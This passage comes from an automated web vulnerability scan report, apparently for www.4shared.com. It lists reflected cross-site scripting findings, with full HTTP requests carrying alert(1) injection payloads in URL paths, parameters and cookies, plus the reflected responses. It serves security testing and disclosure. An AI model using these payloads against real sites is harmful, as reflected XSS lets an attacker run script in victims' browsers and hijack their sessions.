Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise3e997&quot;-alert(1)-&quot;7bb2d897bb0/banners/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3DAF2D9C428EAB31F61D3BF61A35CD60.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:31:54 GMT
Content-Length: 36320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

5.7. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a805f"-alert(1)-"4c476fd3f21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/bannersa805f&quot;-alert(1)-&quot;4c476fd3f21/desktop/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BCC54BBB2A80A834314C7F9C9B8CCA67.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:09 GMT
Content-Length: 36331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback
...[SNIP]...

5.8. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a31ad"-alert(1)-"d183c0a7079 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktopa31ad&quot;-alert(1)-&quot;d183c0a7079/728x90.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A9E5C096071D6B340A0CD040F160790B.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:24 GMT
Content-Length: 36331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.9. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0759"-alert(1)-"b5db9f6f713 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls

Response

HTTP/1.1 404 /advertise/banners/desktop/728x90.jspe0759&quot;-alert(1)-&quot;b5db9f6f713
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=78F6ABDF9E1F83884170846AE905EE6D.dc285; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:39 GMT
Content-Length: 36331


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.10. http://www.4shared.com/contact.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /contact.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dabbb"-alert(1)-"c3f9028a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact.jspdabbb"-alert(1)-"c3f9028a5f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /contact.jspdabbb&quot;-alert(1)-&quot;c3f9028a5f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7605F5D00D0FE3651D892172B7D724A.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:43 GMT
Connection: close
Content-Length: 36102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/contact.jspdabbb"-alert(1)-"c3f9028a5f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.11. http://www.4shared.com/css/common.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf1a6"-alert(1)-"93e9e1ca1ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /csscf1a6"-alert(1)-"93e9e1ca1ea/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /csscf1a6&quot;-alert(1)-&quot;93e9e1ca1ea/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9945AFA63F6156987186E12CABD47B3D.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:37 GMT
Content-Length: 36846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/csscf1a6"-alert(1)-"93e9e1ca1ea/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.12. http://www.4shared.com/css/common.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51356"-alert(1)-"0c3edb7ca9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/common.css51356"-alert(1)-"0c3edb7ca9f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/common.css51356&quot;-alert(1)-&quot;0c3edb7ca9f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FF38715E34696F682B603791528F2490.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:48 GMT
Content-Length: 36833


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/common.css51356"-alert(1)-"0c3edb7ca9f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.13. http://www.4shared.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17143"-alert(1)-"8e70496ad1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css17143"-alert(1)-"8e70496ad1f/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css17143&quot;-alert(1)-&quot;8e70496ad1f/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C418A6718141B4DED03FB108B759A002.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css17143"-alert(1)-"8e70496ad1f/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.14. http://www.4shared.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33c86"-alert(1)-"04029f7d211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.css33c86"-alert(1)-"04029f7d211?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/main.css33c86&quot;-alert(1)-&quot;04029f7d211
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5DC79C3CAAAA22F8BA9BF7E8CB1C3AA7.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:33 GMT
Content-Length: 36121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/main.css33c86"-alert(1)-"04029f7d211";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.15. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f987f"-alert(1)-"dff384d2e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssf987f"-alert(1)-"dff384d2e3e/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /cssf987f&quot;-alert(1)-&quot;dff384d2e3e/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D3153B42395E4699F91C0059655651A4.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:43 GMT
Content-Length: 36901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cssf987f"-alert(1)-"dff384d2e3e/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

5.16. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c20"-alert(1)-"0b7443b060a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.cssc7c20&quot;-alert(1)-&quot;0b7443b060a
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BA654DA392D19A26D4D4D21F2FB850BC.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:55 GMT
Content-Length: 36901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.17. http://www.4shared.com/desktop/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb9b8"-alert(1)-"fce9bca0f19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktopeb9b8"-alert(1)-"fce9bca0f19/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /desktopeb9b8&quot;-alert(1)-&quot;fce9bca0f19/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C96FBC536CDE4E9B1B430C66668E2CE7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:02 GMT
Connection: close
Content-Length: 36103


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/desktopeb9b8"-alert(1)-"fce9bca0f19/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

5.18. http://www.4shared.com/enter.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4861a"-alert(1)-"6a1c01b4181 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /enter.jsp4861a"-alert(1)-"6a1c01b4181 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /enter.jsp4861a&quot;-alert(1)-&quot;6a1c01b4181
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4120E419A42EF4B824AB35C4C8D717A1.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:03 GMT
Connection: close
Content-Length: 36108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/enter.jsp4861a"-alert(1)-"6a1c01b4181";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.19. http://www.4shared.com/enter.jsp [au parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The value of the au request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 was submitted in the au parameter. This input was echoed as 8fdd1"style="x:expression(alert(1))"f5d5aa7c370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /enter.jsp?sId=o2l1egVaZXKhvv6e&&fau=1&au=18fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
